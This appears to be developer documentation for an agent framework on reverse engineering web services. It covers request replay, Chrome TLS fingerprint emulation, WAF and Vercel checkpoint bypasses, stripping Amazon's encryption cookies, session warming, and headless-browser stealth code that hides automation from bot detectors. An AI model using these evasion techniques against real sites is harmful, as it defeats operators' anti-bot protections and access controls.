6. Test — `agentos test-skill <skill>` validates against shapes and expectations.
Browse toolkit commands
| Command | What it does |
|---|---|
| `agentos browse request <skill> <url>` | Make an authenticated HTTP request (same TLS fingerprint as engine), show full headers, cookies, response |
| `agentos browse cookies <skill>` | Cookie inventory — all cookies from all sources with timestamps and provenance |
| `agentos browse auth <skill>` | Auth resolution trace — which provider won, identity, timing |
| `python3 bin/browse-capture.py <url> --port 9222` | CDP network capture — navigate Brave to a URL, capture every request/response with full headers and bodies |
See Browse Toolkit spec for details.
See Auth & Runtime for the full methodology, including:
- Credential Bootstrap Lifecycle — the five-phase pattern from entry through API key storage
- Network Interception — three layers: `capture_network` for page-load, fetch interceptors for user interactions, DOM inspection for native form POSTs
- Cookie Mechanics — SameSite, HttpOnly, cross-domain behavior, extraction methods
- CSRF Patterns — double-submit cookies, synchronizer tokens, NextAuth CSRF
- Web Navigation — redirect chains, interstitials, signup vs login, API key management flows
- Playwright Gotchas — `type` vs `fill` for React forms, honeypot fields, and when HTTPX replay fails
- Vendor guides — NextAuth.js, WorkOS
Write operations — replay, don’t reconstruct
Write operations (creating orders, adding to carts, submitting forms) are where most RE bugs hide. The API accepts your request (200 OK) but stores degraded data because your payload was subtly wrong.
Principles
1. Replay, don’t reconstruct. Capture a working browser request and replay its exact structure. If the browser sends 15 fields on a cart item, send 15 fields. Don’t “simplify” to the 6 you think matter. The 9 you dropped might include section UUIDs, selling options, or measurement types that the server needs to properly resolve the item.
2. Trace data provenance. For every field in a write request, document which read endpoint provided the value. Don’t just document the shape — document the data flow:
getStoreV1.catalogSectionsMap[secKey][i].catalogSectionUUID
→ addItemsToDraftOrderV2.items[].sectionUuid
getStoreV1...catalogItems[].sectionUUID
→ addItemsToDraftOrderV2.items[].sectionUuid (different! item-level, not parent)
3. Compare field-by-field. After making a write call, compare your result against browser-created state. Don’t just check “200 OK” or “items exist.” Check: do items have images? Prices? Can the browser render them normally? Grayed-out images or “Nothing to eat here” means your data was accepted but degraded.
4. Preserve raw data. When extracting from a read endpoint, keep the original response data alongside your clean shape. Your clean shape is for display; the raw data is for downstream write operations that need the exact fields the API expects back. Don’t lossy-extract into your own shape and throw away the original.
5. Hook BOTH fetch AND XHR. Some sites use fetch() for reads but XMLHttpRequest for writes
(Uber Eats does this). If you only hook one, you’ll miss the write calls entirely.
6. No silent fallbacks on writes. Never use `raw.get("X") or alternative_source` for fields in write operations. If the field is missing, fail loudly — the error message will reveal the actual bug (wrong casing, wrong nesting, missing data). The `or` pattern is fine for display but poison for writes: the API silently accepts wrong data and you don’t find out until the UI shows “unavailable” or grayed-out images.
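A minimal "fail loudly" accessor in this spirit (`require` and its error message are hypothetical, not part of the SDK):

```python
def require(raw: dict, *path: str):
    """Walk a nested dict and raise loudly when a write-payload field is absent."""
    node = raw
    for key in path:
        if not isinstance(node, dict) or key not in node:
            raise KeyError(
                f"missing {'.'.join(path)} (stopped at {key!r}) — "
                "re-capture the read response instead of guessing")
        node = node[key]
    return node

# Display code may tolerate gaps; write payloads must not:
# payload["sectionUuid"] = require(raw_item, "sectionUUID")  # raises if absent
```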
Real example: Uber Eats cart bug
We captured addItemsToDraftOrderV2 and built item payloads ourselves. The API returned 200,
items appeared in the cart with correct names and prices. But images were grayed out and clicking
items showed “Nothing to eat here.” Root cause: we used the wrong sectionUuid and subsectionUuid
(same UUID for all items instead of per-item values from the catalog), and omitted sellingOption.
The server accepted the items but couldn’t resolve them against the catalog properly.
Fix: pass through the raw catalog item data from getStoreV1 instead of reconstructing it.
Starting a new reverse-engineered skill
npm run new-skill -- my-service
# Then start investigating:
# 1. Open the service in Playwright
# 2. capture_network to find API endpoints
# 3. inspect to understand page structure
# 4. Document what you find in requirements.md
# 5. Implement with httpx in Python
For detailed examples, see each layer’s documentation. Real-world reference implementations:
| Skill | What it demonstrates |
|---|---|
| `skills/uber/` | Two completely different APIs on one platform — rides use GraphQL (riders.uber.com/graphql), Eats uses RPC (ubereats.com/_p/api/). CDP browse capture for API discovery, JS bundle grepping for full endpoint surface (32 endpoints extracted), receipt HTML parsing with data-testid selectors, real-time event channels (SSE), separate cookie domains. Reference for CDP-based discovery and RPC API reverse engineering. |
| `skills/amazon/` | Deep anti-bot bypass (client hints, Siege encryption, session warming), session staleness (30-min TTL, CDP session warming), fallback CSS selector chains for resilient HTML parsing, AJAX endpoints for dynamic content, SESSION_EXPIRED provider retry convention, tiered cookie architecture. Full reference for 1-transport and 4-content. |
| `skills/exa/` | Full credential bootstrap: NextAuth email code → Playwright form submit → session cookies → API key extraction from dashboard API. Reference for nextauth.md |
| `skills/goodreads/` | Multi-tier discovery, Apollo cache extraction, auth boundary mapping, runtime config fallback |
| `skills/claude/` | Cookie-based auth, Cloudflare stealth settings, API replay from browser session |
| `skills/austin-boulder-project/` | JS bundle config extraction, tenant-namespace auth |
Reverse Engineering — Transport & Anti-Bot
How to get a response from a server that doesn’t want to talk to you.
This is Layer 1 of the reverse-engineering docs:
- Layer 1: Transport (this file) — TLS fingerprinting, headers, WAF bypass, headless stealth
- Layer 2: Discovery — 2-discovery — finding structured data in pages and bundles
- Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
- Layer 4: Content — 4-content — extracting data from HTML when there is no API
- Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
- Layer 7: MCP Servers — 7-mcp — discovering, probing, and evaluating remote/stdio MCPs
HTTP Client — agentos.http Routes Through the Engine
The short answer
from agentos import http
# Default — works for most JSON APIs
resp = http.get(url, **http.headers(accept="json"))
# Behind CloudFront/Cloudflare — WAF headers + HTTP/2
resp = http.get(url, **http.headers(waf="cf", accept="json"))
# Full page navigation (Amazon, Goodreads)
with http.client(cookies=cookie_header) as c:
resp = c.get(url, **http.headers(waf="cf", mode="navigate", accept="html"))
All HTTP goes through the Rust engine via agentos.http. The engine handles transport mechanics (HTTP/2, cookie jars, decompression, timeouts, logging). Headers are built in Python via http.headers() — the engine sets zero default headers.
Default rule: ALWAYS use `http.headers()`. Never construct headers dicts manually. We are acting as a real browser (Brave/Chrome); there is no reason NOT to send proper browser headers. Without `http.headers()`, you get no User-Agent, no `sec-ch-*`, no `Sec-Fetch-*` — and some APIs silently reject you with 500 or 403. Pass service-specific headers (CSRF tokens, session IDs) via the `extra=` parameter.
# WRONG — no browser headers, will fail on strict endpoints
http.post(url, cookies=cookies, headers={"x-csrf-token": "x"}, json=body)
# RIGHT — browser-grade headers + service-specific extras
http.post(url, cookies=cookies, json=body,
          **http.headers(waf="cf", accept="json", extra={"x-csrf-token": "x"}))
TLS fingerprinting — why the engine uses wreq with BoringSSL
AWS WAF, Cloudflare, and other CDNs compute a JA3/JA4 fingerprint from every TLS ClientHello and compare it to the claimed User-Agent. If the UA says “Chrome 131” but the TLS fingerprint says “rustls” or “urllib3,” the request gets flagged as a bot. Sensitive pages (Amazon orders, Chase banking, account settings) have higher anomaly thresholds than product pages — so the homepage works but the orders page redirects to login.
The engine uses wreq (a reqwest fork) backed by BoringSSL — the same TLS library Chrome uses. With Emulation::Chrome131, every request produces an authentic Chrome JA4 fingerprint (t13d1516h2_8daaf6152771), including correct HTTP/2 SETTINGS frames, pseudo-header order, and WINDOW_UPDATE values. This is not string-matching — wreq constructs the same ClientHello Chrome would, using the same library, and the fingerprint falls out naturally.
Verified (2026-04-01): Same cookies from Brave Browser. reqwest (rustls) → Amazon redirects to signin. wreq (BoringSSL, Chrome 131) → Amazon returns 7 orders. The only difference was the TLS fingerprint.
Python clients (requests, httpx) have similar issues — requests/urllib3 has a blocklisted JA3 hash (8d9f7747675e24454cd9b7ed35c58707). Skills don’t hit this because all HTTP goes through the engine’s wreq client, not Python libraries directly.
When to use http2=False (Vercel)
Vercel Security Checkpoint blocks HTTP/2 clients outright — every request
returns 429 with a JS challenge page, regardless of cookies or headers. But
HTTP/1.1 passes cleanly.
In http.headers(), this is handled by the waf= knob:
# waf="cf" → http2=True (CloudFront/Cloudflare need HTTP/2)
resp = http.get(url, **http.headers(waf="cf", accept="json"))
# waf="vercel" → http2=False (Vercel blocks HTTP/2)
resp = http.get(url, **http.headers(waf="vercel", accept="json"))
The WAF template automatically sets the right http2 value. No need to remember which WAF needs what.
Not every Vercel-hosted endpoint enables the checkpoint. During Exa testing,
auth.exa.ai (Vercel, no checkpoint) accepted h2; dashboard.exa.ai
(Vercel, checkpoint enabled) rejected it. The checkpoint is a per-project
Vercel Firewall setting — you have to test each subdomain.
Tested against dashboard.exa.ai (Vercel + Cloudflare):
| | http2=True | http2=False |
|---|---|---|
| session + cf_clearance | 429 | 200 |
| session only | 429 | 200 |
| no cookies at all | 429 | 200 (empty session) |
Cookies and headers are irrelevant — the checkpoint triggers purely on the HTTP/2 TLS fingerprint.
Rule of thumb: use waf="cf" for CloudFront/Cloudflare, waf="vercel" for Vercel. If you get 429 from Vercel, it’s the HTTP/2 fingerprint. If you get 403 from CloudFront, you need HTTP/2 + client hints.
Diagnostic protocol: isolating the variable
When a request fails, don’t guess — isolate. Test each transport variable independently to find the one that matters:
Step 1: Try httpx http2=True (default)
→ Works? Done.
→ 429/403? Continue.
Step 2: Try httpx http2=False
→ Works? Vercel Security Checkpoint. Use http2=False, done.
→ Still 403? Continue.
Step 3: Try with full browser-like headers (Sec-Fetch-*, Sec-CH-UA, etc.)
→ Works? WAF header check. Add headers, done.
→ Still 403? Continue.
Step 4: Try with valid session cookies
→ Works? Auth required. Handle login first.
→ Still 403? It's TLS fingerprint-level.
Step 5: Use curl_cffi with Chrome impersonation
→ Works? Strict JA3/JA4 enforcement. Use curl_cffi.
→ Still 403? Something non-standard (CAPTCHA, IP block).
The key insight from the Exa reverse engineering session: test one variable
at a time. During Exa testing, we created a matrix of http2=True/False x
cookies/no-cookies x headers/no-headers and discovered that ONLY the h2
setting mattered. Cookies and headers were completely irrelevant to the
Vercel checkpoint. This prevented unnecessary complexity in the skill code.
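One way to organize such a session is to enumerate the matrix up front so every pair of runs differs in exactly one knob (a sketch only — the actual requests would go through `agentos.http` or the browse toolkit, and the status codes would be recorded per case):

```python
from itertools import product

def transport_matrix():
    """All combinations of the three transport knobs from the Exa session."""
    cases = []
    for http2, cookies, browser_headers in product([True, False], repeat=3):
        cases.append({"http2": http2,
                      "cookies": cookies,
                      "browser_headers": browser_headers})
    return cases

# 8 combinations; compare status codes across pairs that differ in one knob.
```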
You don’t need curl_cffi or httpx
The engine’s wreq client already emits Chrome’s exact TLS cipher suites, GREASE values, extension ordering, ALPN, and HTTP/2 SETTINGS frames. Skills should never use httpx, requests, or curl_cffi directly — agentos.http handles all of this automatically.
All I/O through SDK modules
Skills must use agentos.http for all HTTP — never urllib, requests, httpx, or subprocess directly. All I/O goes through SDK modules (http.get/post, shell.run, sql.query) so the engine can log, gate, and manage requests.
Browser-Like Headers — http.headers() Knobs
Headers are built in Python via http.headers(), which composes four independent concerns:
from agentos import http
# Four knobs, ordered by network layer:
conf = http.headers(
waf="cf", # WAF vendor — "cf", "vercel", or None
ua="chrome-desktop", # User-Agent — preset name or raw string
mode="fetch", # Request type — "fetch" (XHR) or "navigate" (page load)
accept="json", # Content — "json", "html", or "any"
extra={"X-Custom": "value"}, # Merge last, overrides anything
)
# Returns {"headers": {...}, "http2": True/False}
# Spread into http.get/post/client with **
resp = http.get(url, **conf)
What each knob controls
| Knob | What it sets | Values |
|---|---|---|
| `waf` | Client hints (Sec-CH-UA, etc.) + `http2` | `"cf"` (CloudFront/Cloudflare, http2=True), `"vercel"` (http2=False), `None` |
| `ua` | User-Agent header | `"chrome-desktop"`, `"chrome-mobile"`, `"safari-desktop"`, or raw string |
| `mode` | Sec-Fetch-* headers (only when `waf` is set) | `"fetch"` (XHR: dest=empty, mode=cors), `"navigate"` (page: dest=document, mode=navigate + device hints) |
| `accept` | Accept header | `"json"`, `"html"`, `"any"` (default: `*/*`) |
| `extra` | Custom headers merged last | Any dict — auth tokens, CSRF, Origin, Referer, etc. |
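To make the composition concrete, here is a toy re-implementation of the knob logic (values are illustrative — the real presets and full header sets live in `sdk/agentos/http.py`):

```python
_UA = {
    "chrome-desktop": (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/131.0.0.0 Safari/537.36"
    ),
}
_ACCEPT = {"json": "application/json", "html": "text/html,*/*;q=0.8", "any": "*/*"}

def headers(waf=None, ua="chrome-desktop", mode="fetch", accept="any", extra=None):
    h = {
        "User-Agent": _UA.get(ua, ua),   # preset name or raw string
        "Accept": _ACCEPT[accept],
        "Accept-Language": "en-US,en;q=0.9",
        "Accept-Encoding": "gzip, deflate, br, zstd",
    }
    if waf:  # WAF profiles add Sec-Fetch-* request metadata
        if mode == "navigate":
            h.update({"Sec-Fetch-Dest": "document",
                      "Sec-Fetch-Mode": "navigate",
                      "Sec-Fetch-User": "?1"})
        else:  # "fetch" — XHR-style call
            h.update({"Sec-Fetch-Dest": "empty",
                      "Sec-Fetch-Mode": "cors",
                      "Sec-Fetch-Site": "same-origin"})
    h.update(extra or {})                # extra= merges last, overrides anything
    return {"headers": h, "http2": waf != "vercel"}  # Vercel blocks HTTP/2
```

Note how `extra=` winning the merge lets a skill override even the Accept header, matching the "merge last, overrides anything" rule above.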
Standard headers (always included)
Every http.headers() call sets User-Agent, Accept-Language, and Accept-Encoding. These are normal browser headers — not WAF-specific. Override via extra= if needed.
WAF headers — waf="cf" and mode="navigate"
When waf is set, http.headers() adds Sec-Fetch-* metadata. The mode knob controls what type of request you’re simulating:
mode="fetch" (default) — XHR/fetch() API call:
Sec-Fetch-Dest: empty,Sec-Fetch-Mode: cors,Sec-Fetch-Site: same-origin
mode="navigate" — Full page navigation (used by Amazon, Goodreads):
Sec-Fetch-Dest: document,Sec-Fetch-Mode: navigate,Sec-Fetch-User: ?1- Plus device hints:
Device-Memory,Downlink,DPR,ECT,RTT,Viewport-Width - Plus
Cache-Control: max-age=0,Upgrade-Insecure-Requests: 1
Amazon’s Lightsaber bot detection checks these device hints. Without them, auth pages redirect to login. The mode="navigate" knob handles all of this automatically.
Sec-Fetch-Site values
| Scenario | Value | How to set |
|---|---|---|
| JS on app.example.com calling app.example.com/api | same-origin | Default in mode="fetch" |
| Full page navigation (user typed URL) | none | Default in mode="navigate" |
| Cross-origin API call | cross-site | extra={"Sec-Fetch-Site": "cross-site"} |
Common patterns
from agentos import http
# JSON API, no WAF (Gmail, Linear, Todoist — 15 skills)
resp = http.get(url, **http.headers(accept="json", extra={"Authorization": f"Bearer {token}"}))
# HTML scraping behind CloudFront (Amazon, Goodreads)
with http.client(cookies=cookie_header) as c:
resp = c.get(url, **http.headers(waf="cf", mode="navigate", accept="html"))
# JSON API behind Cloudflare (Claude.ai)
# Claude needs custom Sec-CH-UA (Brave v146) and http2=False
conf = http.headers(waf="cf", accept="json", extra=CLAUDE_HEADERS)
conf["http2"] = False # override WAF default
with http.client(cookies=cookie_header, **conf) as c:
resp = c.get(url)
# Vercel checkpoint bypass (Exa)
resp = http.get(url, **http.headers(waf="vercel", accept="json"))
# Full control — skip helpers entirely
resp = http.get(url, headers={"Accept": "text/csv", "X-Custom": "value"})
# Debug — print what you're sending
print(http.headers(waf="cf", mode="navigate", accept="html"))
Version drift
The Chrome version in Sec-CH-UA is pinned in sdk/agentos/http.py (_UA and _WAF dicts).
If you start getting unexpected 403s months later, the pinned version may be too old.
Update the version strings in the SDK to match the current stable Chrome release.
How to discover the right headers
Use the Playwright skill’s capture_network or the fetch interceptor to see exactly
what headers a real browser sends on the same request. Compare with http.headers() output
and add any missing ones via extra=.
Cookie Stripping — Disabling Client-Side Features
Some sites inject JavaScript-driven features via cookies. When you’re scraping with HTTPX (no JS engine), these features produce unusable output. The fix: strip the trigger cookies so the server falls back to plain HTML.
Amazon’s Siege Encryption
Amazon uses a system called SiegeClientSideDecryption to encrypt page content
client-side. When the csd-key cookie is present, Amazon sends encrypted HTML
blobs instead of readable content. The browser decrypts them with JavaScript;
HTTPX gets unreadable garbage.
Solution: strip the trigger cookies using skip_cookies= on http.client():
_SKIP_COOKIES = ["csd-key", "csm-hit", "aws-waf-token"]
with http.client(cookies=cookie_header, skip_cookies=_SKIP_COOKIES,
**http.headers(waf="cf", mode="navigate", accept="html")) as c:
resp = c.get(url)
The engine filters these cookies out of the jar before sending. With csd-key stripped, Amazon serves plain, parseable HTML. The csm-hit and aws-waf-token cookies are also stripped — they’re telemetry/WAF cookies that can trigger additional client-side behavior.
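The filtering itself is simple; a sketch of what `skip_cookies=` does to a `k=v; k2=v2` cookie header string (illustrative — the engine filters the jar, not a string):

```python
def strip_cookies(cookie_header: str, skip: list) -> str:
    """Drop trigger cookies by name from a 'k=v; k2=v2' header string."""
    kept = []
    for pair in cookie_header.split(";"):
        name = pair.split("=", 1)[0].strip()
        if name not in skip:
            kept.append(pair.strip())
    return "; ".join(kept)

# strip_cookies("session-id=abc; csd-key=xyz; ubid=123", ["csd-key"])
# → "session-id=abc; ubid=123"
```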
Diagnosing encryption
If your HTML responses contain garbled content, long base64 strings, or empty containers where data should be, check for client-side decryption:
- Compare the page source in the browser (View Source, not DevTools Elements) with your HTTPX response
- Search for keywords like `decrypt`, `Siege`, `clientSide` in the page JS
- Try stripping cookies one at a time to find which one triggers encryption
Reference: skills/amazon/amazon.py SKIP_COOKIES.
Response Decompression — You Must Handle What You Advertise
When you send Accept-Encoding: gzip, deflate, br, zstd (as all browser-like profiles do), the server will compress its response. Your HTTP client must decompress it. If it doesn’t, you get raw binary garbage instead of HTML — and every parser returns zero results.
This is a silent failure. The HTTP status is 200, the headers look normal, and Content-Length is reasonable. But resp.text is garbled bytes. It looks like client-side encryption (see above), but the cause is much simpler: the response is compressed and you’re not decompressing it.
How agentos.http handles it
The Rust HTTP engine uses wreq with gzip, brotli, deflate, and zstd feature flags enabled. Decompression is automatic and transparent — resp["body"] is always plaintext.
Why this matters
Brotli (RFC 7932) is a compression algorithm designed by Google for the web. It compresses 20-26% better than gzip on HTML/CSS/JS. Every modern browser supports it, and servers aggressively use it for large pages. Amazon’s order history page, for example, returns ~168KB of brotli-compressed HTML. Without decompression, you get 168KB of binary noise and zero order cards.
The trap: small pages (homepages, API endpoints) may not be compressed or may use gzip which some clients handle by default. Large pages (order history, dashboards, search results) almost always use brotli. So your skill works on simple endpoints and silently fails on the important ones.
Diagnostic
If your response body contains non-UTF-8 bytes, starts with garbled characters, or contains no recognizable HTML despite a 200 status:
- Check the response `Content-Encoding` header — if it says `br`, `gzip`, or `zstd`, the body is compressed
- Verify your HTTP client has decompression enabled
- In agentOS: `agentos.http` handles this automatically. If you’re using raw `urllib.request`, it does NOT decompress brotli
Reference: Cargo.toml wreq features — gzip, brotli, deflate, zstd.
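The failure mode is easy to reproduce with the stdlib (a diagnostic sketch — `agentos.http` already does this transparently, and brotli/zstd would need the third-party `brotli`/`zstandard` packages):

```python
import gzip

def decode_body(body: bytes, content_encoding: str) -> str:
    """Decompress a response body based on Content-Encoding, then decode."""
    if content_encoding == "gzip":
        body = gzip.decompress(body)
    elif content_encoding in ("br", "zstd"):
        raise NotImplementedError(f"{content_encoding}: not in the stdlib")
    return body.decode("utf-8")

html = "<html>orders</html>"
wire = gzip.compress(html.encode())
assert wire[:2] == b"\x1f\x8b"        # gzip magic bytes — the 'garbled' prefix
assert decode_body(wire, "gzip") == html
```

Feeding `wire` straight to a parser without the decompress step is exactly the "200 OK but zero results" trap described above.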
Session Warming
Some services track request patterns and flag direct deep-links from an unknown session as bot traffic. The fix: warm the session by visiting the homepage first, then navigate to the target page.
def _warm_session(client) -> None:
"""Visit homepage first to provision session cookies."""
client.get("https://www.amazon.com/", headers={"Sec-Fetch-Site": "none"})
This establishes the session context (cookies, CSRF tokens, tracking state) before hitting authenticated pages. Without it, Amazon redirects order history and account pages to the login page even with valid session cookies.
When to warm:
- Before any authenticated page fetch (order history, account settings)
- When the first request to a deep URL returns a login redirect despite valid cookies
- When you see WAF-level blocks only on direct navigation
When warming isn’t needed:
- API endpoints (JSON responses) — they don’t use page-level session tracking
- Public pages without authentication
- Sites where direct deep-links work fine (test first)
Reference: skills/amazon/amazon.py _warm_session().
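A sketch of the warm-then-fetch pattern (the stub client and `_warmed` flag are illustrative; real skills hold an `http.client()` session):

```python
class _StubClient:
    """Stand-in for an HTTP session, recording the URLs it fetches."""
    def __init__(self):
        self.calls = []
    def get(self, url, **kwargs):
        self.calls.append(url)
        return {"status": 200, "url": url}

def warmed_get(client, url, homepage="https://www.amazon.com/"):
    """Visit the homepage once per client before any deep link."""
    if not getattr(client, "_warmed", False):
        client.get(homepage, headers={"Sec-Fetch-Site": "none"})  # direct nav
        client._warmed = True
    return client.get(url)

c = _StubClient()
warmed_get(c, "https://www.amazon.com/gp/css/order-history")
warmed_get(c, "https://www.amazon.com/gp/css/order-history")
# homepage hit exactly once, then the deep links
```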
Headless Browser Stealth
Default Playwright/Chromium gets blocked by many sites (Goodreads returns 403, Cloudflare serves challenge pages). The fix is a set of anti-fingerprinting settings.
Minimum stealth settings
from playwright.sync_api import sync_playwright
with sync_playwright() as p:
browser = p.chromium.launch(
headless=True,
args=["--disable-blink-features=AutomationControlled"],
)
context = browser.new_context(
user_agent=(
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/131.0.0.0 Safari/537.36"
),
viewport={"width": 1440, "height": 900},
locale="en-US",
timezone_id="America/New_York",
)
page = context.new_page()
page.add_init_script("""
Object.defineProperty(navigator, 'webdriver', { get: () => false });
""")
What each setting does
| Setting | Why |
|---|---|
| `--disable-blink-features=AutomationControlled` | Removes the `navigator.webdriver=true` flag that Chromium sets in automation mode |
| Custom `user_agent` | Default headless UA contains HeadlessChrome which is trivially blocked |
| `viewport` | Default headless viewport is 800x600, which no real user has |
| `locale` / `timezone_id` | Some bot detectors check for mismatches between locale and timezone |
| `navigator.webdriver = false` | Belt-and-suspenders override in case the flag leaks through other paths |
Real example: Goodreads
Default Playwright against goodreads.com/book/show/4934 returns HTTP 403 with
one network request. With stealth settings, the page loads fully with 1400+ requests
including 4 AppSync GraphQL calls. See skills/goodreads/public_graph.py
discover_via_browser() for the implementation.
CDP Detection Signals — Why Playwright Gets Caught
Even with the stealth settings above, Playwright is still detectable at the Chrome DevTools Protocol (CDP) layer. These signals are invisible in DevTools and unrelated to headers, cookies, or user-agent strings. They matter most during reverse engineering sessions — if a site behaves differently under Playwright than in your real browser, CDP leaks are likely the cause.
Runtime.Enable leak
Playwright calls Runtime.Enable on every CDP session to receive execution
context events. Anti-bot systems (Cloudflare, DataDome) detect this with a few
lines of in-page JavaScript that only fire when Runtime.Enable is active.
This is the single most devastating detection vector — it works regardless of
all other stealth measures.
sourceURL leak
Playwright appends //# sourceURL=__playwright_evaluation_script__ to every
page.evaluate() call. Any page script can inspect error stack traces and see
these telltale URLs. This means your __NEXT_DATA__ extraction, DOM inspection,
or any other evaluate() call leaves a fingerprint.
Utility world name
Playwright creates an isolated world named __playwright_utility_world__ that
is visible in Chrome’s internal state and potentially to detection scripts.
What to do about it
These leaks are baked into Playwright’s source code — no launch flag or init script fixes them. Two options:
- For most RE work: the stealth settings above (flags, UA, viewport, webdriver override) are enough. Most sites don’t check CDP-level signals. If a site seems to behave differently under Playwright, check for these leaks before adding complexity.
- For strict sites (Cloudflare Bot Management, DataDome): use `rebrowser-playwright` as a drop-in replacement. It patches Playwright’s source to eliminate `Runtime.Enable` calls, randomize sourceURLs, and rename the utility world. Install with `npm install rebrowser-playwright` and change your import.
This doesn’t affect production skills. Our architecture uses Playwright
only for discovery — production calls go through surf() / HTTPX, which has
zero CDP surface. The CDP leaks only matter during reverse engineering sessions
where you’re using the browser to investigate a protected site.
Cookie Domain Filtering — RFC 6265
When a cookie provider (brave-browser, firefox) extracts cookies for a domain like .uber.com, it returns cookies from ALL subdomains: .uber.com, .riders.uber.com, .auth.uber.com, .www.uber.com. If the skill’s base_url is https://riders.uber.com, sending cookies from .auth.uber.com is wrong — the server picks the wrong csid and redirects to login.
The engine implements RFC 6265 domain matching: when resolving cookies, it extracts the host from connection.base_url and passes it to the cookie provider. The provider filters cookies so only matching ones are returned:
host = "riders.uber.com"
.uber.com → riders.uber.com ends with .uber.com → KEEP (parent domain)
.riders.uber.com → riders.uber.com matches exactly → KEEP (exact match)
.auth.uber.com → riders.uber.com doesn't match → DROP (sibling)
.www.uber.com → riders.uber.com doesn't match → DROP (sibling)
This is automatic — skills don’t need to do anything. The filtering happens in the cookie provider (brave-browser/get-cookie.py, firefox/firefox.py) based on the host parameter the engine passes from connection.base_url.
When it matters: Only when a domain has cookies on multiple subdomains with the same cookie name. Most skills are unaffected — Amazon, Goodreads, Chase all have cookies on a single domain. Uber is the first case where it matters.
The old workaround: Before RFC 6265 filtering, the Uber skill had a _filter_cookies() function that deduplicated by cookie name (last occurrence wins). This has been removed — the provider handles it correctly now.
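The matching rule is easy to reason about with a small sketch (illustrative only; the real filtering lives in the engine and the cookie providers):

```python
def domain_matches(cookie_domain: str, host: str) -> bool:
    """RFC 6265 domain-match: keep a cookie when the request host equals the
    cookie's domain or is a subdomain of it. Sibling subdomains never match."""
    d = cookie_domain.lstrip(".")
    return host == d or host.endswith("." + d)
```

Running this against the Uber example above keeps `.uber.com` and `.riders.uber.com` for host `riders.uber.com` and drops the `.auth.uber.com` / `.www.uber.com` siblings.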
Cookie Resolution — http.cookies()
Skills can resolve cookies for any domain without knowing which browser provides them:
from agentos import http
# Resolve cookies — provider discovery is automatic
cookie_header = http.cookies(domain=".uber.com")
resp = http.post(url, cookies=cookie_header, **http.headers(accept="json"))
# Specific account (multiple people logged in on different browsers)
cookie_header = http.cookies(domain=".uber.com", account="uber@contini.co")
http.cookies() uses the same auth resolver as connection-based auth: it tries all installed cookie providers (brave-browser, firefox, etc.), picks the best one, and returns a cookie header string. No hardcoded provider names in skill code.
Playwright integration
capture_network accepts a cookie_domain param that resolves cookies automatically:
# One step — no manual cookie extraction needed
run(skill="playwright", tool="capture_network", params={
    "url": "https://riders.uber.com/trips",
    "cookie_domain": ".uber.com",
    "pattern": "**graphql**",
})
This replaces the old 3-step flow (extract from provider → reformat → inject).
Debugging 400/403 Errors
| Symptom | Likely cause | Fix |
|---|---|---|
| 403 from CloudFront with a bot-detection HTML page | JA3/JA4 fingerprint blocked | Shouldn’t happen with wreq — if it does, check that the engine is running the wreq build |
| 400 from CloudFront, body is "Forbidden" or a short string | WAF rule triggered (header order, ALPN) | Use waf="cf" and check mode= |
| 400, body looks like "404" | API Gateway can’t route the request — usually a missing tenant/auth header | Find and add the missing header via extra= |
| 403 for a same-origin API (e.g. claude.ai) | Missing Sec-Fetch-* headers | Use waf="cf" — sets Sec-Fetch-* automatically |
| 403 from headless Playwright | Default Chromium automation fingerprint | Add stealth settings (see Headless Browser Stealth above) |
| 429 with “Vercel Security Checkpoint” HTML | Vercel blocks the HTTP/2 fingerprint | Use waf="vercel" (sets http2=False) |
| Works in browser, fails in Python regardless | An Authorization value that’s not a JWT | Look for short Authorization values in the bundle (namespace, env name, etc.) |
Using Playwright to capture exact headers
When you’re stuck, use Playwright to intercept the actual XHR and log all headers (including those added by axios interceptors that aren’t visible in DevTools):
from playwright.sync_api import sync_playwright

def capture_request_headers(url_pattern: str, trigger_url: str) -> dict:
    """Navigate to trigger_url and capture headers from the first request matching url_pattern."""
    captured = {}

    def on_request(req):
        # Only keep the first matching request, per the docstring
        if url_pattern in req.url and not captured:
            captured.update(req.headers)

    with sync_playwright() as p:
        browser = p.chromium.launch()
        page = browser.new_page()
        page.on("request", on_request)
        page.goto(trigger_url)
        page.wait_for_timeout(3000)
        browser.close()
    return captured
Skill File Layout
skills/<skill-name>/
readme.md <- agentOS skill descriptor (operations, adapters, etc.)
requirements.md <- reverse engineering notes, API docs, findings log
<skill>.py <- Python module with all API functions
icon.svg <- skill icon
Keep requirements.md as a living document — update it every time you discover
a new endpoint, figure out a new header, or resolve a mystery.
Real-World Examples in This Repo
| Skill | Service | Transport config | Key learnings |
|---|---|---|---|
| skills/amazon/ | Amazon (Lightsaber) | waf="cf", mode="navigate", accept="html" | Full device hints required, skip_cookies= for Siege encryption, session warming. Chrome TLS fingerprint (wreq) required for orders page — Amazon’s WAF uses JA4 + OpenID max_auth_age=0 per-feature auth gates. |
| skills/austin-boulder-project/ | Tilefive / approach.app | accept="json" + auth header | CloudFront, Authorization = namespace string |
| skills/claude/ | claude.ai (Cloudflare) | waf="cf", accept="json", http2=False override | Custom Sec-CH-UA (Brave v146), Cloudflare bypass needs Sec-Fetch-* |
| skills/exa/ | dashboard.exa.ai (Vercel) | waf="vercel", accept="json" | Vercel checkpoint is purely TLS — cookies and headers irrelevant |
| skills/goodreads/ | Goodreads (CloudFront) | waf="cf", accept="html" | Public GraphQL via CloudFront, headless Playwright needs stealth settings |
| skills/uber/ | Uber (CloudFront) | accept="json" + custom headers | RFC 6265 cookie domain filtering — first skill where sibling subdomain cookies caused bugs |
Reverse Engineering — Discovery & Data Extraction
Once you can talk to the server (see 1-transport), how do you find and extract structured data?
This is Layer 2 of the reverse-engineering docs:
- Layer 1: Transport — 1-transport
- Layer 2: Discovery (this file) — finding structured data in pages and bundles
- Layer 3: Auth & Runtime — 3-auth
- Layer 4: Content — 4-content — HTML scraping when there is no API
- Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
- Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
Tool: browse capture (bin/browse-capture.py) is the primary discovery tool. It connects to your real browser (Brave/Chrome) via CDP and captures all network traffic with full headers and response bodies. For DOM inspection, use the browser’s own DevTools. See the overview for the full toolkit.
